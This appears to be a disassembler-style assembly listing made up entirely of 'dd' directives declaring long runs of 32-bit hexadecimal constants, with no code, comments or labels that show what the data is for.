dd 0F55216A3h, 0C1B7FE95h, 4288A4E7h, 3375B23Ch, 0A864C5EAh
dd 8E96773Fh, 9BA92A1Fh, 0DE702B21h, 96ACC417h, 40F3375h
dd 6EBB597Ah, 7FB7A852h, 19E3A41Ah, 0F7F04FA1h, 3D74B9C4h
dd 2F03F2FCh, 9A0CE6E1h, 0CEE50CD1h, 4181B4BFh, 66D244CFh
dd 12C9239Dh, 0CA8A88Fh, 15CB759Ch, 0A9D8202Bh, 755204Ah
dd 0AD3E4B67h, 3BD262C4h, 0BD828709h, 4AD8258Bh, 5C07EC5Eh
dd 1AEBD53Fh, 0A5CFBC68h, 74371119h, 0EAC0B141h, 0E5D482D1h
dd 577BA177h, 40A190D0h, 0A892CD1Fh, 1DBB77B2h, 4CFC5D8h
dd 5C519AC6h, 1F2027B1h, 18B2F925h, 5697EC28h, 7D7735D2h
dd 31D1E2B1h, 6FACD47Ch, 0B09207F2h, 9F395295h, 0BF12D1BAh
dd 0CB79EE93h, 62609F44h, 550421DAh, 617542ABh, 4426AEAEh
dd 0F3DA4CC9h, 0D5EB051Dh, 5A1E134Bh, 0C671E565h, 2DCDBD28h
dd 6FD8E67Ch, 42ADE717h, 5CA088EDh, 0F9A68A2h, 0B84F512Eh
dd 0C5661E35h, 0E6BF9287h, 5EBA2F18h, 0F756A2C4h, 3C78D6C1h
dd 0DC573838h, 7984D88Ah, 9681403Bh, 0C7677CD6h, 0E07EA6D1h
dd 748B34AAh, 3C4A1E38h, 22AE12F7h, 0CFF4412Fh, 0EDD42022h
dd 8AABCB75h, 0F4C4FBECh, 6187B20h, 0E540A94Ah, 87F5BDF7h
dd 9EFD2B9Dh, 0AA8B2E5Ah, 0F1F13540h, 4BBEC7D3h, 0AE5FBBF0h
dd 24DCC6C5h, 8A294DDBh
dd 2BDB861Ch, 0E7DAF2D5h, 5799CDA1h, 0AD6C2976h, 575DD281h
dd 0F43F63F1h, 7E60FA9Ah, 0E347A10Bh, 902DABB1h, 0FA098A2Bh
dd 0F49BA7C5h, 882248AEh, 0D00A5BE3h, 968E5ECEh, 40FCDBE7h
dd 0F3F86EA2h, 0EEA836Bh, 55805FF0h, 4E5C7C55h, 0D54C8E88h
dd 485F0CC8h, 793CCBADh, 0B0AF1482h, 0D044960Ah, 5149DFBDh
dd 0A2AAD5F9h, 5F9DBD19h, 0A60EB37Ch, 0C9E2B283h, 7712B7F1h
dd 0F678EBA4h, 5EB80FBFh, 0C7D4BD73h, 4BA5211Dh, 0C11DB495h
dd 0CCB81592h, 0E0362A9Bh, 19EACF7Ah, 5DDA8DA7h, 117734C7h
dd 2D308CC6h, 0FF06D2A5h, 54003FBAh, 1A4D2451h, 93F1568h
dd 0EA84F607h, 0DED0D1D2h, 5D335A3Dh, 72B6BFD8h, 0FE752D22h
dd 88AAF7CEh, 5475F10Dh, 3697E411h, 0B478D951h, 91ACE57Dh
dd 0E1013C7Eh, 361C1DF7h, 4A00100Eh, 0A69EB221h, 0BA1F2AFFh
dd 920438DFh, 2C9D8F25h, 8F8AD30Dh, 6C417FEh, 0D7AECD43h
dd 1DEEA30h, 0D349BAEDh, 0CB487DBAh, 0A84784FBh, 0E340AA09h
dd 9FE8A381h, 8192AFFFh, 5646A857h, 0B303EBD4h, 40B14B0Ch
dd 2DC7FDC6h, 0E768FBC0h, 0BC8D6721h, 0D5179A30h, 0EB0CBFC1h
dd 7406D58Bh, 0A3354E16h, 2EC637B3h, 3E8849EAh, 1134A5Bh
dd 83B4CA3Ch, 0FC343A6h, 6B9FDF9Dh, 0E9B2FBA5h, 163807D6h
dd 0CA31D7D4h, 0FB183EFBh, 73E2651Ch, 588EA1BEh, 66B22B6Fh
dd 0EACF502Eh, 382294EDh, 557A46Fh, 9E66788Ch, 7F7D7D2Ch
dd 0FE26068h, 72161A9Ch, 2A835047h, 0C7E1DCEDh, 4877D5A0h
dd 3D8765Ch, 6BFB940h, 0E4D48492h, 13748AB0h, 0E915F941h
dd 859A5500h, 0FCE8717Fh, 0FADCA768h, 2F11ACFAh, 4A020DD5h
dd 0FABD7DEDh, 0CEFE1C38h, 56F9A351h, 10AD5BD5h, 0E86717F8h
dd 0BC9859B5h, 3F8EB4BAh, 536434E4h, 1C05B7A3h, 0BF700A6Bh
dd 82D570B9h, 0C092C015h, 0AD195A60h, 0FA1B50C7h, 0BC4A38AAh
dd 5049B5B9h, 0A5065E9Dh, 4A6F20D2h, 63CB0F01h, 7E545149h
dd 951C0C04h, 651A3555h, 23F57C73h, 0FA30135Fh, 77C343CFh
dd 0F37F1FEAh, 20D38121h, 0B9EE8EEh, 97E27D64h, 194EA86Eh
dd 60AAAA0Fh, 1841D03h, 0D28BB602h, 3442DAAFh, 85C22B86h
dd 0A45DD11Eh, 0E14A2FEEh, 0ABA8D388h, 0C45F00EDh, 8A5BBFD4h
dd 843F03F7h, 0F774FC30h, 0DDC53338h, 0C24B3E7Dh, 41DC144Ah
dd 0CAFEA942h, 0DF0B4EEAh, 0C0654FD4h, 886C6595h, 38C0AD29h
dd 59EF29C8h, 0B1E3D348h, 78719CD6h, 0B9CCEA70h, 942E835Ch
dd 44C29719h, 0DFAD6B53h, 0C71CBB5Eh, 73B83707h, 0B241B459h
dd 0FB652D0Bh, 5806199Dh, 0B2BFAAB8h, 0C2D92C77h, 0FD65B5C9h
dd 0F15DDB6h, 680FF732h, 1A078A66h, 66A16A5Bh, 0ABB2A3D2h
dd 0E8BEC6AEh, 875D210Bh, 0D5855751h, 0DCB4BC32h, 0DA576Ch
dd 51BC6D5Dh, 0F8A085F3h, 0C47085CAh, 9BE4537Bh, 6E17CD7Eh
dd 106F816Ch, 195A142Dh, 4AF6ED4Eh, 0B7AF0ED2h, 968B9198h
dd 6D4FED5Ch, 4BE6AFF3h, 0BC2A0519h, 42AC49ECh, 6B787A27h
dd 0F3580F91h, 93EC17EBh, 49DC1BC7h, 880EADBh, 4AD1B1B8h
dd 2B3683F7h, 0F381D0B0h, 4AD9276Eh, 0D945F5D9h, 29ADCFB6h
dd 14FAC9DFh, 0DDFEC842h, 0DD3EA081h, 0E37C9FC2h, 0BBE70F43h
dd 0E16D243Fh, 0AD5307D4h, 76514F81h, 1F97449Dh, 0C592A2Ah
dd 6B52DCE5h, 9B053075h, 0F0620B1Eh, 0B5D7214Bh, 0FFD7E2FBh
dd 4AFAC1F2h, 295BB5A1h, 324F5327h, 0A02C7DADh, 88CF7AFh
dd 0AFA4EC47h, 83602E98h, 7B4F6547h, 0BE197836h, 0E6AB3BDCh
dd 8EAE36A7h, 45F91256h, 50D1E325h, 0BD7B4E17h, 36AF8164h
dd 0ED563221h, 0A7B2AE07h, 0EA8D8A44h, 0CD77B9ABh, 2FC611DEh
dd 0E9DBF195h, 0B0AEF3D7h, 52DC90CDh, 0FB6A8D77h, 57FAEAC7h
dd 479D7EC4h, 2D1C5B30h, 8B8DD143h, 20F959DAh, 0F0B7DD59h
dd 3C78440Ch, 0B13AF61Dh, 0D784093Ah, 48B26E19h, 0D5B40518h
dd 0EFD69F63h, 0CF8A0A40h, 67AB6494h, 0EE2EB2D3h, 6BE3D9BFh
dd 7BC9B3E8h, 8DC2ACE2h, 0D2413525h, 0E534CE1Dh, 67E8A1DBh
dd 4578CAEFh, 0C76CB9D1h, 10F8AA4Ah, 0FAC222C7h, 3940EE17h
dd 9E56B465h, 6F057FEEh, 9F07C066h, 31F1E9Ah, 4082971Ah
dd 40FF1715h, 2330D5FAh, 4CCA360Eh, 8EDC186Ch, 75C5BE16h
dd 0ACA0B6ABh, 0D970CF77h, 7E4FA3B1h, 0EB57D7DEh, 0BE53D3B8h
dd 0F63CB36Eh, 9830676Fh, 0CED4C4BDh, 37372C85h, 4BE1D76Ah
dd 91608611h, 7ACEAD29h, 0F14A7E14h, 65CD464Ch, 0F324280Dh
dd 0FE2482ADh, 3B712B4h, 0AFA84FB2h, 5A7575Dh, 443B3BF1h
dd 0F7BB8688h, 648BD626h, 12AEA296h, 3D64AA4Ah, 1A385C1Ch
dd 3F199A34h, 0C2847FE4h, 962D9177h, 36202558h, 7E8BBC7Ch
dd 70575387h, 0D7D83A14h, 1EB9E158h, 664C780Ah, 24CBF576h
dd 48B613BEh, 32C7B7BDh, 0A9F0888Eh, 0D51871F9h, 0B36646Dh
dd 0BEA623BBh, 8CAF9FB6h, 6BE99CB0h, 219EA482h, 0CA1BE0ABh
dd 477B29ACh, 7893982Bh, 8E0492E9h, 3BABEB1Ah, 0D26B731Bh
dd 0F2FEA1C9h, 8296BBD5h, 4A089E2Ch, 0B67FA178h, 0CC3E947Bh
dd 12BCEFC7h, 75DACD8h, 0C201E741h, 2E0F0E77h, 1BEA750Ch
dd 0E3D3BA11h, 0CEE0E1FEh, 168DF3A5h, 5588AFAEh, 3BE4AA6Eh
dd 0A7B602F8h, 0CB6AC202h, 0CA3B7F88h, 933D7873h, 6CC89106h
dd 5F0ED868h, 0CBFCBFAFh, 0B32FCBF1h, 0D6CCFB3Dh, 0BE40B14Dh
dd 0D5B28627h, 3FE58607h, 1CB5F0D7h, 0A1F5F857h, 38F07CAh
dd 0B061F2B1h, 0E2F2DAECh, 0FCAD92A0h, 0B72EA8Eh, 7965D49Eh
dd 62DF232h, 0AD2D0B38h, 0D12B70EEh, 0CED7C7A2h, 8214E6A9h
dd 50E0BE83h, 0AD963E85h, 1C03F221h, 0FB755AF0h, 0E527481Ch
dd 0F3009F34h, 0EAF2CC12h, 3729D7F4h, 343306B8h, 0FC092B15h
dd 0E3C627Dh, 0D159A9D7h, 11A4EF3Bh, 0B2135DA3h, 154C5025h
dd 6F85291Fh, 0F8DF823Bh, 0D7C274E1h, 40516DDDh, 3BA5E3A1h
dd 2BB6D9A9h, 0A471F9EDh, 144B8CC6h, 0B72E69Bh, 0D0FE2690h
dd 0A6BDF615h, 4393056Dh, 5697D5E1h, 7E62E3C7h, 0B0FED3B8h
dd 0E1186236h, 12A5FF68h, 55323E04h, 0F20C68D6h, 0E75D38D5h
dd 0A2E8553h, 0FEDDBE0Fh, 0C77DA5E1h, 0F0B02C0Ah, 7CB064FDh
dd 0D64221AEh, 0CA2AFC67h, 4B653A13h, 0FA209A48h, 0D7444BC5h
dd 96B8318Bh, 627E8CCFh, 81FDD05Ch, 0BF182C9Ah, 0F097B446h
dd 0D1A95F85h, 5A3F9F64h, 25B22B99h, 4997B9Fh, 6B5E37C7h
dd 5DE2D639h, 69E3C362h, 0C464265Fh, 0C3682FC4h, 0D4BB50EAh
dd 0EE8D1A65h, 0ED6015D4h, 0A874A50Ah, 0A1817E37h, 0FBAA0AC6h
dd 4DE7612Fh, 0F28D2AD2h, 0C1EB2CFAh, 0F60768A3h, 0A8E135FAh
dd 0F8D8EDD5h, 9E583185h, 0C46E3F35h, 0D579ACD6h, 2D3C968Eh
dd 8CEC5941h, 8E07950Bh, 0DA2D78E4h, 0F7C7C5A9h, 9605A664h
dd 0A9CB1B6Ah, 0ED35A512h, 876F0158h, 0E3D44472h, 9FA24303h
dd 5703DCE1h, 5B0EFFFBh, 0B06795AEh, 707CF0A8h, 79D23328h
dd 56CAD1A5h, 58D82E5h, 0CC4AA55h, 0FCCD0536h, 3994FB5h
dd 7FDD062Fh, 3BD79F98h, 22D0596Dh, 0D9E776AEh, 9387382Fh
dd 0E3913B91h, 0D8A75867h, 0F3E49599h, 27EE023Bh, 0FC2F2F83h
dd 65FB2334h, 32FAACE2h, 3BEF9218h, 0E3D7C56h, 0FF27CEC4h
dd 0A24E756h, 730B99E8h, 3868FB6h, 66FC75EDh, 65DAFA08h
dd 8D24C10h, 665B22F8h, 80ADB9AEh, 0E5149117h, 31306ED1h
dd 3532A079h, 465A176Eh, 0D5819E1Bh, 0C4D813E3h, 9E254EF6h
dd 244F8686h, 89257CACh, 70DEE6EFh, 96E98B17h, 0F28CC1EFh
dd 55245B81h, 0EBA6403Ch
dd 0D281689Fh, 818F2DB6h, 1BE703ECh, 804B6B65h, 0AC1154B3h
dd 165B3FEEh, 3A850F26h, 0C59CEB19h, 0D880E703h, 0CF56F53Ch
dd 91002DAEh, 0C655B3A3h, 13A91ACEh, 61F81F9Ah, 9050C5C0h
dd 2FB19C7Eh, 0B8DF170Fh, 669DE393h, 6D40C302h, 23855DBBh
dd 5055F7D5h, 94F7FD5Dh, 30BD1542h, 0DE8D4894h, 0A59C968Dh
dd 38C4886h, 0DC4B6C72h, 0B6A6A56h, 14E1D45Dh, 71BEDD69h
dd 0C9F5F265h, 0BF0DD83Ch, 0BE5A484Fh, 47FB02CEh, 0AB605F77h
dd 5B04331Ch, 6347AF7h, 1D1D7B3Eh, 41EADB3Ah, 0C2A2D57Ah
dd 414EC4C3h, 3A9F83F1h, 0A699E3D9h, 0BBFDC501h, 0B0564FE1h
dd 18DA2F34h, 8E46C62Ah, 0B9DC2F83h, 0C760AF69h, 0FCE22D16h
dd 1CE124FEh, 0C82A90FCh, 8EA7F6F4h, 68C39325h, 0A495F63Dh
dd 7F03AEF8h, 500FE81Dh, 0FDFCC7EBh, 6E0DDC0Bh, 0AA7B877Ah
dd 0BF8B25CAh, 3C993A1Ah, 92F22BEAh, 4B26E5BEh, 97F93898h
dd 91DCE088h, 0E797E27Dh, 72A59863h, 0A1113599h, 15173655h
dd 0B3B2DFCAh, 6AC9F8B7h, 3306B5A7h, 87402069h, 8F180E5Fh
dd 0FE36E707h, 0CEBE178Eh, 0E1E87BD4h, 43E3DEEDh, 0D5C2AFC5h
dd 9BB51182h, 42E67A9h, 0B122A4Ch, 7C714CA1h, 0F2CDA970h
dd 3D74E121h, 8225429h, 9F938416h, 95BF0073h, 8F69BFE2h
dd 4D6A863Eh, 0FD6C53B4h, 0BF26DDFCh, 7370116Ch, 7B97A233h
dd 8797E78Eh, 0B460F0A5h, 1D037B2Bh, 743F24F4h, 0F836F97Eh
dd 0ED127765h, 868CA6F1h, 79F00BAFh, 0A471EFD8h, 0B2CB040h
dd 0A95402FCh, 8D2D2307h, 0B1F6B6Eh, 6675F43h, 61CD1394h
dd 309DA273h, 0DA1C7FC2h, 0E7B8FA39h, 0D2E8E246h, 12FB5E78h
dd 0A75A71B8h, 28635B15h, 2AA005B4h, 0AB5FFD7Dh, 0AEDBAF46h
dd 9CC87E33h, 96F24DB5h, 1AFC2B4h, 0CE771ED1h, 0C7F7812h
dd 2F01CEB3h, 0E6FF1063h, 42C977D3h, 4EE348A6h, 703DD5C5h
dd 151EED30h, 2E7D04F0h, 57991CEh, 9A7F4912h, 3AAB46F6h
dd 56BE0FC8h, 62397D37h, 2A250325h, 1E77CC0Fh, 1864B5E9h
dd 0AAC68E4Eh, 9D3F7DF5h, 19748D3Fh, 0A8FB5552h, 92240513h
dd 5DF59FC9h, 0A562B503h, 0B4419BADh, 85C903A7h, 0A99275AAh
dd 8FF993F0h, 0EAC4497Eh, 0F772FC90h, 0D3F52E0Bh, 82F89068h
dd 75DC2204h, 0B59E2ABEh, 386F92ABh, 0DFCD3D08h, 0B98258C8h
dd 0F6657E66h, 0AD203EFAh, 0C2D82BEFh, 227B9D9Bh, 0C018C2EDh
dd 653BBAD4h, 1A0FD5C4h, 94763757h, 0B7BE45EAh, 0C69A69EDh
dd 22F58D54h, 0A887EACBh, 6079DD7h, 9D12299Ah, 0B938C5DFh
dd 0FCE5A6B5h, 603CE0D8h, 6CDB3851h, 0D5D49CCAh, 6B51F0A1h
dd 6B27F0ADh, 0B3CF56E5h, 44CBB944h, 0B90AC5D2h, 0F508F06Fh
dd 0AD44E7D1h, 0CAA9C734h, 3FAD1E47h, 0D6E3810Eh, 6F610FC0h
dd 8CCA8DBAh, 9ADF743Ch, 12F2D1FDh, 6B887E75h, 8CACEC6Eh
dd 0F46E1C25h, 72B14A66h, 62CFA1DCh, 56556972h, 0EDADE100h
dd 0C94CE802h, 922921F8h, 315E2FBh, 2B30AC7h, 0AF0386E6h
dd 6102CC7Ah, 0E5A1273Eh, 5B8ED9BEh, 4D68929Dh, 925C17FDh
dd 0EE111CADh, 0C68DB973h, 0AC442553h, 39D549DAh, 0E50E9F54h
dd 358A8B5Eh, 850D37E7h, 43C9B12Eh, 0E6D191C6h, 7383F3D5h
dd 86974EC2h, 0B5C5B22Ah, 912D4E68h, 3F8E175h, 0A5E59DBFh
dd 0DE7EB96Dh, 5BAD7771h, 75C7BF1Bh, 9C282B83h, 0EBEA4A34h
dd 3919C2Eh, 0B60F6F52h, 0B3552A9h, 0E2CCC954h, 0F48823E2h
dd 8AE5C071h, 0B70E3117h, 5DE714C9h, 4E86797Bh, 962F42D1h
dd 5D2A3C50h, 6AE69F0Dh, 1F5DD82Ch, 4AECEBD8h, 0E1276F43h
dd 901817F9h, 0D238F2CBh, 0A32E0F66h, 12FD0C3Ah, 7D36B867h
dd 0ABB87C1Bh, 8D947934h, 13D795D8h, 5B6502B9h, 0D0F0DEB3h
dd 0ABBFA775h, 0D649D073h, 4835D095h, 0C71AD71Fh, 8145A227h
dd 2C597AC7h, 1F776311h, 52D1E1B7h, 37F5536h, 0A82622BEh
dd 62A2AE0Eh, 3B4E40D6h, 0A71BE451h, 822EEE29h, 1AF82752h
dd 0BC3FE9A6h, 0B78F787Dh, 0D778411Ch, 942F8E0Eh, 9CEB4F04h
dd 177C03C9h, 10A07250h, 0EA156548h, 0BC45F3BAh, 40A1095h
dd 45F390Ah, 612AE32Bh, 6EFC889Ah, 9F5457C4h, 0A108746Ch
dd 6222651Dh, 0E5020F69h, 0A86F0B31h, 13EBEC9Eh, 244F9F11h
dd 1EF136Ah, 56A3B5Dh, 14741F5Ch, 16749CC4h, 2D453545h
dd 0EFD621FEh, 2CEF470Bh, 0D2A988F1h, 0F3BDDF86h, 0D5D40FC4h
dd 9F49C080h, 0B7E6050Dh, 7B0165B6h, 0D95D703Ch, 0C33C6BEEh
dd 0B23A665Bh, 8E4E5355h, 8D6A6B47h, 0CF3E0571h, 5A54BBC0h
dd 31CCCCE9h, 397FCBA1h, 207C0FC7h, 1D0DD3EAh, 7712D33Ch
dd 51423BE6h, 7F7DFE71h, 5F2F4D0Fh, 5BF39197h, 0AFF7516Ch
dd 7C750F33h, 45558101h, 17050E1Ch, 95F0650Bh, 6FBFA27Bh
dd 0E2E055A6h, 8C3624A6h, 0F55F0BB6h, 0AC3F3F43h, 0B738BA88h
dd 0F93E05D3h, 8966CE7Ah, 62A9259h, 9F33878Eh, 0FAA3E820h
dd 0AEAA6300h, 0AE9B4D80h, 82ACD7E4h, 0BBA56A8Ch, 0F4DFA68Eh
dd 6F92C0FCh, 79966222h, 0DD46A26Fh, 81F6FA36h, 556C3237h
dd 35C5D9CAh, 0F9360BA9h, 7F3B666Eh, 0B3C8D075h, 0C5E95144h
dd 2D537955h, 415B74Ch, 0A12C8943h, 0FA64640Bh, 4606521Ch
dd 82EC8482h, 0E921DEEBh, 0A01C864Bh, 0F32ABFFAh, 536DC6E3h
dd 97F21734h, 0E6FA68BEh, 0C5D3EBDFh, 0E3C4751h, 212491h
dd 0D1560423h, 0F1D643A3h, 5A86FF67h, 985A8E07h, 144818D5h
dd 0B768069Fh, 0FC481BACh, 99BE28Dh, 467DD787h, 0B7EAED7Dh
dd 0BE04B81Fh, 6ABD2B52h, 0A1C3AC4Fh, 0B70D9D62h, 0EA311FDBh
dd 7BCEC717h, 0D0BC4A9h, 0DF820F8Eh, 6E06E3C8h, 0DA9D2A3Bh
dd 0E5972714h, 0D5AB72D1h, 0DDC1ACF4h, 53538D55h, 5FB3E4A0h
dd 0C482AC16h, 44035E87h, 5B984D04h, 0F1C5CAC3h, 0CB780A4Ah
dd 0D4C4F0F9h, 344AFCB5h, 0CAAE17F6h, 7D1AB94Fh, 8F711C44h
dd 0DE3CCF3Eh, 41C4C307h, 0CEB37BA5h, 3F3729E8h, 4A859C1Dh
dd 6A77EA0h, 0F49EA34Fh, 0A7F5AF80h, 0EF7180BFh, 8DA3B8EBh
dd 9FD6BB9Ah, 7309054Bh, 0C5D4DF68h, 9B9D9CD5h, 226CEF3Dh
dd 7E6876CCh, 0FCBFF8D3h, 7D5E77A1h, 57A88203h, 4FD21138h
dd 0A471DD17h, 0F6EDD056h, 0D3EC5FCAh, 5BAEF2D4h, 0A93B7A68h
dd 3D19DB33h, 777D4B70h, 3567546h, 98FF99F2h, 8CF9B8E0h
dd 3ACBD9D4h, 0B73BB8C8h, 0C1D02E72h, 4F16AB24h, 6555E675h
dd 3BE7B476h, 2C7F17E7h, 57981059h, 0D850028Bh, 5A3F63FFh
dd 3FA58AABh, 81B3B022h, 870474F4h, 6AF83C6h, 0C397CEF6h
dd 155DDAC9h, 0A0FCDCCCh, 784ACF06h, 0F9B6F83Eh, 72A0F595h
dd 7418C2DDh, 0BBF1FE4Fh, 4CD51EF4h, 0E461EFC9h, 0FF69A8E8h
dd 0FB055302h, 703EA54Bh, 17385BD2h, 2FAA0D67h, 6D79B46Ch
dd 0AEB83334h, 0DA5A78F1h, 4B34F29Bh, 3C69306h, 0AFD18677h
dd 88EFEFF0h, 6534595h, 0DA1CDB7Bh, 0BDE440F1h, 25979D4Eh
dd 0F1CDCCB3h, 0F3B19ABAh, 0B4370FC1h, 0B3856A5Fh, 0B988B00Ch
dd 4DCB6DCBh, 0F6FD1C49h, 0D8B2D8EFh, 770E8D39h, 0AB125FB8h
dd 6C020F25h, 0AE935960h, 8ABF1536h, 4E587788h, 74A61333h
dd 0B6B348C5h, 0E4222583h, 0FFE0967Ch, 628D3DACh, 9BF9B128h
dd 0C7BEA79Ah, 0F2DA8182h, 0E698DFBDh, 390C27B4h, 7AFA680Eh
dd 98CB34C0h, 1314DB23h, 0BE7CC674h, 0AF686422h, 28A82716h
dd 34E18DE7h, 75789961h, 0F188470Ch, 4F641C12h, 0D6CD7E0Bh
dd 3CA955C9h, 0F4E1E670h, 7E5D8913h, 0B07C09E1h, 0EE6AD4F6h
dd 368108C2h, 9D1C0700h
dd 0A0C7600Dh, 9F6C0DD5h, 144A906Ah, 0E1762474h, 913CA80Ch
dd 51224A23h, 98740F4Fh, 0FD48DAAh, 504E3EE2h, 24D53C0Ah
dd 0CB4213E9h, 0AD810BF7h, 6730AF8Eh, 4510F15Eh, 15748EC3h
dd 0B2E6182Fh, 0DB5BF7A4h, 36AFEC31h, 0B2E1C66Eh, 0B8AC4644h
dd 219473BCh, 0B9C2DE51h, 88463EA3h, 0DED4D398h, 0FB607C17h
dd 9224B5AAh, 903F25B7h, 0D3C346BAh, 5FDB5568h, 77A96DF9h
dd 0C5B7053Ch, 2A0F5FA2h, 4689A7E6h, 0E80AB58h, 5472D977h
dd 5701811Dh, 5572245h, 56F703B8h, 0E1EB04A5h, 402161DDh
dd 322FF07Ch, 82A4FF51h, 1785C86Dh, 0BF675A31h, 0AD6549F4h
dd 0E335079Dh, 0FB995CA0h, 0C621A93h, 0C64AC7DEh, 0ED28D1B8h
dd 0DBDEB30Eh, 0A3786B6Fh, 950F8286h, 0D7EB8528h, 9BB4EE69h
dd 0B47E1B2Dh, 1FCD6FF0h, 5E728C3Fh, 6927FCB8h, 0E0C33B4h
dd 4A8B9A1h, 184A8253h, 0A0ADE72Dh, 0A398446Bh, 0B97B6964h
dd 55891DEAh, 10AA5168h, 0DFE25B5Bh, 97DEF236h, 0AA55A91Ah
dd 3E33CA57h, 0EE35A277h, 32BBF0BFh, 45BA7A93h, 0EEFB608Ch
dd 576FDDB5h, 0DD1EC61h, 96F348B7h, 7E2431AAh, 579755D8h
dd 252DC4B5h, 51F5D9FDh, 0ECABC7CAh, 6546932Eh, 0F1F298DFh
dd 0F54D1CFh, 0CBC2306Bh, 24CB1BC9h, 0D28911D0h, 0CE02FFA4h
dd 0FC7B5BFBh, 646C8C46h, 0D1983093h, 0E780CF8Ah, 813AFC71h
dd 0AC538Ah, 0A1B6F11Ah, 7BD747F1h, 554C78D7h, 58460952h
dd 2D1D121Bh, 30A0D27Dh, 0AF13AA45h, 542A1499h, 1B869CF7h
dd 83586AA7h, 3B7B351Ch, 49AA1ABEh, 5F1BE198h, 49ECD3B3h
dd 46C034DFh, 726A57F0h, 34F8680Fh, 10DF199Bh, 0DB5E133Bh
dd 837E1AE8h, 1D45AC62h, 6F3D3C3Eh, 0C6A4D43Bh, 77D083EFh
dd 68E1D56Fh, 59202DF9h, 0DA95F869h, 0CC3C5BCBh, 2586F875h
dd 58E7D88Ah, 0B0C54F5Dh, 0EF660069h, 0E875518Ah, 8E361F8h
dd 5C9FD570h, 0C37B65ADh, 0ED45870h, 9989CAF9h, 55F1FA0Ah
dd 64269AA6h, 0C1E57FD7h, 916B5A72h, 386D1592h, 0BF41F45Bh
dd 307CB3D8h, 0E0D4A460h, 0F1817745h, 0CA35B46Eh, 8AA3FFB9h
dd 61AD0147h, 0E62967E2h, 5AC468E8h, 5FC13725h, 5617D56Fh
dd 0D31784ECh, 70B50D2h, 7B88A883h, 7EB9AFB1h, 243CC2CAh
dd 843316E9h, 25F4FA45h, 792F765Ch, 7543263Dh, 0A2C2262Dh
dd 0DF7E6B70h, 0DDD764E8h, 6C6D1DE7h, 0D3E59F81h, 0EB457AA8h
dd 7CF7D576h, 81F3240Eh, 1D51E14Dh, 114C6A01h, 0D4B204BEh
dd 340ACC26h, 0D5F8537Dh, 9F8E808h, 5317BB92h, 9B7398BEh
dd 5B5E2502h, 0F6121E01h, 0EA11E90Fh, 5B8A6C83h, 7F0C8053h
dd 83CDD425h, 0AF533FAFh, 0B1D68481h, 0F496AEA1h, 9F5438ACh
dd 3E9CF41h, 603B4B39h, 83FFA846h, 0F9BF3CEh, 35C3C5B8h
dd 4BCC0D0Ah, 5BDBF256h, 0DD40750Bh, 0A951424Ah, 346C5354h
dd 0B713513Eh, 0EBF5F4Eh, 0ED6DE70Ch, 850B781h, 0F015B79Fh
dd 83122AC4h, 10CD95D5h, 413B332Ch, 1E06499Bh, 80E615F3h
dd 43258059h, 0EA8AB4CBh, 28240FB5h, 51EDC93Eh, 0D03F7AB6h
dd 8D476084h, 0F76B1C13h, 0BB1F7F7Dh, 1F3465Bh, 90698D56h
dd 339B135Ch, 0DD4D5B98h, 0AFF610B9h, 1894F504h, 0E86E3E8Ch
dd 0C2D4A376h, 0F89C2DD7h, 16439C60h, 773CC6Ch, 0FB391275h
dd 0B958FD10h, 0BDF55744h, 5F971F19h, 0D2E2B68Eh, 9AB55C91h
dd 4852C061h, 6383775Fh, 99F74EBh, 802F1903h, 0D6E20967h
dd 0D5AF564Ch, 6BC2D153h, 0DE5A8D8Dh, 0ABF7AA5Fh, 4CCCAE07h
dd 0DBC59874h, 7C77DD47h, 1EA26A58h, 8EE97CAh, 46732BB0h
dd 262FDC91h, 9F658F9h, 95428FD5h, 295B094Ah, 385DAED3h
dd 927C5CD9h, 0DC92E228h, 0C6B36165h, 0DA3DCA55h, 8DE0F7E9h
dd 52FF974Dh, 0BECA0D68h, 1F0B4080h, 0FDB97433h, 742486BEh
dd 398A7C56h, 0E9AF7AE5h, 5B87CC72h, 0D0985794h, 35A10B58h
dd 4AE6D8DAh, 0B441D5A2h, 0FAF38952h, 228D2B9Dh, 0D505BAD1h
dd 7600C607h, 0B8C6F7ECh, 3B34DB9Dh, 6A61FEA0h, 0C548A2B7h
dd 7B3A64CFh, 9D3CFAF3h, 0D0DAB9FAh, 0AC24C3B8h, 0DC29398h
dd 0C2C979A5h, 2312EE40h, 4ED1C2CDh, 5635E03Eh, 0A2202A8Bh
dd 8390B31Ch, 0AB9CEAF5h, 39E8FC4Eh, 0B4480C98h, 97932711h
dd 0DEE1BC21h, 0B97FA3B8h, 40E41E88h, 9523A495h, 5B8014CBh
dd 4BABB906h, 66D189D9h, 84C80B7h, 1DB99DC5h, 27FABBECh
dd 79EA98DAh, 6D1B13AFh, 3D5FCDCEh, 0B8F2EF7Ch, 736B0943h
dd 35C3DB39h, 0FA9D9135h, 0AF6A6537h, 4BFB19ABh, 0BA185106h
dd 585F9E6Bh, 0EAB8EA3Fh, 7E95006Ah, 2F33B0FCh, 31B0C600h
dd 0D466E6E9h, 0FE2359EBh, 1D117EE6h, 0CF3232DFh, 0C7D941E2h
dd 46A8C6AAh, 7982E8C9h, 0C8B57410h, 206C619Bh, 7DEDFF56h
dd 0AA095FD5h, 27074B88h, 5F0AD76Bh, 7EF8F12h, 0D58C6BAEh
dd 0E4F5AACBh, 91CE97F3h, 0C4EDBC19h, 86C73BEEh, 850D85E8h
dd 34D0489Ah, 273D2CB3h, 0CA3EA1C1h, 742FD014h, 0D02F9A7Bh
dd 55ACE0A2h, 7BB6F20h, 5743C3Fh, 3397C586h, 25540C66h
dd 44CF2EEh, 164DDF28h, 360915D6h, 11C14702h, 0ECDC263Eh
dd 75222091h, 9FA0B120h, 0FB5A9CE9h, 25628EC6h, 0EFFC6FE3h
dd 0C7C9F4F3h, 2B8E5A5Dh, 7AEB8AA8h, 0FC14840Eh, 209804D0h
dd 3A499B7Eh, 0A3A71EB7h, 555E196Dh, 0ECEB9FC4h, 85A20D8Eh
dd 0DEF9558Ah, 0EE6E9F6Ch, 8E0E1DBFh, 12DA58E6h, 4303E2FAh
dd 2D9D3EA0h, 737F869Ah, 0D8A9CC28h, 24FDBDF3h, 0F3A7FC6h
dd 0CE910B46h, 7F019F31h, 64EB6AD4h, 68122B5Fh, 0D2A193FCh
dd 0B69E4A4Dh, 646D24F3h, 1330389Ah, 0DEC92F5Bh, 0F22153F8h
dd 5B6310E0h, 17D52E3Eh, 0F6B4F8BFh, 3EA507EEh, 0C7C943B7h
dd 6E8B6266h, 55A3B131h, 9B1CA79Dh, 1233A9BCh, 0F9A7987Dh
dd 0AE44ADC0h, 0E623F9Ch, 5FF3BF1Ah, 0E09D797Fh, 3C1A0AA1h
dd 0FEC97001h, 95B22175h, 7165C057h, 2EEBA954h, 4277AD13h
